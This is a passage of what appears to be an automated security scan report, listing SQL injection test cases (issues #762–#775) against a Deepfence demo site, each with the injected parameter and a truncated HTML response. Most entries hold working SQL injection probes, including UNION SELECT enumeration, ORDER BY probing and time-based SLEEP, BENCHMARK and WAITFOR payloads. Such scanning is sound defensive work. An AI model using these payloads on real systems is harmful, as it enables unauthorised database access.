type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #762\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioAND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+\nCHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+\nCHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+\nCHAR(116)))--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #763\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #764\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #765\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io );waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #766\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #767\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor SLEEP(5)--Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #768\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 21--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89Issue Number #769\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A\n')),4,5,6,7,8#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #770\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #771\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io OR 2947=LIKE('ABCDEFG',UPPER(HEX(\nRANDOMBLOB(500000000/2))))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #772Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\") or (\"x\")=(\"x\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #773\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\"&\"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #774\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #775\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 